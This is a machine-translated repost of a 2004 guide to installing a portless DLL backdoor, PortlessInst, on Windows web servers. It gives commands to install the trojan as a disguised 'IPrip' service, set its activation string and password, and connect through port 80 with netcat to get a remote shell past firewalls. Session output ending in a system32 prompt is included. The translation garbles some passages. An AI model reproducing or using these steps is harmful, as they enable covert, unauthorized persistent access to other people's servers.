2. Tech
  3. DLL back door portless installation manual

DLL back door portless installation manual

xiaoxiao2021-03-06  56

DLL back door portless installation manual

HELP Document Write by Heiyeluren04 / 02/01

(The article written in this year, take it out, I wrote after my research, I didn't see the help documentation of the back door, but I have no technical content, just commemorate, huh, huh)

Portless Trojans are Trojans in the DLL class, using port multiplexing technology, you can bypass a lot of firewalls, an excellent tool for invasive web servers as a back door. What is port multiplexing technology, is to bind through some ports already used Our shell, generally, those ports are the port allowed by the firewall, and will not be killed.

PortlessSt installation format: portlessinst.exe -install

The back door is installed as a service called IPrip, then it is generally installed: NET START IPRIP is started.

Use the NC class tool to connect: NC -VV alignment IP address 80 port // Because only 80 ports are allowed, because there is a firewall and enter the feature string and port, the command is: : 80 // That is to bind the shell's 80-port of the server, will not be intercepted using NC to connect: NC -VV IP address 80 port

Let us exemplify: 1. Install C: /> PortlessInstportless v1.1 installer by Wineggdrop

USAGE: PortlessInst -Install ActiveString Passwordusage: PortlessInst -Set ActiveString Passwordusage: PortnessInst -unInstall

C: /> portlessinst.exe -install xhl heiyeluren // We use XHL as a feature string, use Heiyeluren as the connection password

C: /> NET Start IPrip // Start our installation service

2. Connect C: /> NC -VV 192.168.0.2 80

DNS FWD / Rev Mismatch: LocalHost! = HYSWLOCALHOST [192.168.0.2] 80 (http) OpenXHL: 80 // Input Features Strings and ports to bind the shell 80

HTTP / 1.1 400 Bad RequestServer: Microsoft-IIS / 5.1Date: Sun, 01 Feb 2004 02:35:23 Gmtcontent-Type: Text / HTMLCONTENT-TYPE: 87

error </ title> </ head> <body> the parameter is incorrect. </ body> </ html> SENT 8, RCVD 224: Notsock</p> <p>C: /> nc -vv 192.168.0.2 80Waring: inverse host lookup failed for 192.168.0.2: h_error 11804: NO_DATAlocalhost [192.168.0.2] 80 (http) openEnter Password: heiyeluren // prompted for a password, we enter heiyeluren Welcome To Portless Backdoor <syrinx> #Shellmicrosoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.</p> <p>C: / windows / system32> // has already gained shell</p> <p>HELP Document Write by Heiyeluren04 / 02/01</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-113328.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="113328" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.033</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'Sau5jjCtvPvW2bl5EnJTprGuIlVvee_2FISB0Rc_2F_2Bigsz9KuZkEJ_2BQiQDJigrmeawb_2BlCmDNLiIIPoXzTLgBo1bQ_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>